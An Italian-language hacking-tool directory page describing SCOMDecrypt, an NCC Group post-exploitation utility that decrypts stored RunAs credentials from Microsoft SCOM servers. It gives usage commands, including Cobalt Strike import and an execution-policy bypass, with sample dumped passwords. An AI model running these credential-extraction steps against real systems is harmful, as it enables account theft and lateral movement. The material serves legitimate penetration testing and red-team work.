Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
SCOMDecrypt — SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers | Kitploit
Strumenti/GitHubGitHub/nccgroup/scomdecrypt
Encryption/Decryption ToolsPassword AttacksPost-ExploitationPenetration TestingRed Teaming
GitHubnccgroup/scomdecrypt

SCOMDecrypt

SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers

Vedi Repository
130242 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

SCOMDecrypt - Strumento per la decrittazione delle credenziali SCOM

Pubblicato come open source da NCC Group Plc - http://www.nccgroup.trust/

Sviluppato da Richard Warren, richard [punto] warren [chiocciola] nccgroup [punto] trust

http://www.github.com/nccgroup/SCOMDecrypt

Rilasciato sotto AGPL, vedere LICENSE per maggiori informazioni

Introduzione

Questo strumento è progettato per recuperare e decrittare le credenziali RunAs memorizzate nei database di Microsoft System Center Operations Manager (SCOM).

Per ulteriori informazioni, si prega di consultare il post sul blog di NCC Group qui

Prerequisiti

Per eseguire lo strumento sono necessari privilegi amministrativi sul server SCOM. È inoltre necessario disporre dell'accesso in lettura alla seguente chiave di registro:

root@kitploit:~
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\MOMBins

È possibile verificare manualmente di poter vedere il database recuperando i dettagli di connessione dalle seguenti chiavi:

root@kitploit:~
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\Database\DatabaseServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\Database\DatabaseName

Utilizzo

Lo strumento è disponibile in due formati. Il primo è un binario C# che può essere semplicemente eseguito sul server SCOM senza argomenti come segue:

root@kitploit:~
.\SCOMDecrypt.exe
[+] <SCXUser><UserId>bob</UserId><Elev>sudo</Elev></SCXUser>:H a c k T h e P l a n e t
[+] administrator:W i n t e r 2 0 1 5 !
[+] alice:P a s s w 0 r d 1 2 3 !

Esiste anche una versione PowerShell dello strumento. Questa è utile in uno scenario di post-exploitation per l'uso con strumenti come Cobalt Strike o Empire. Per utilizzare lo strumento con Cobalt Strike:

root@kitploit:~
powershell-import C:\path\to\SCOMDecrypt.ps1
powershell Invoke-SCOMDecrypt
[+] <SCXUser><UserId>bob</UserId><Elev>sudo</Elev></SCXUser>:H a c k T h e P l a n e t
[+] administrator:W i n t e r 2 0 1 5 !
[+] alice:P a s s w 0 r d 1 2 3 !

Per eseguirlo nella console PowerShell:

root@kitploit:~
powershell.exe -exec bypass
. .\Invoke-SCOMDecrypt.ps1
Invoke-SCOMDecrypt
...
Scarica lo strumento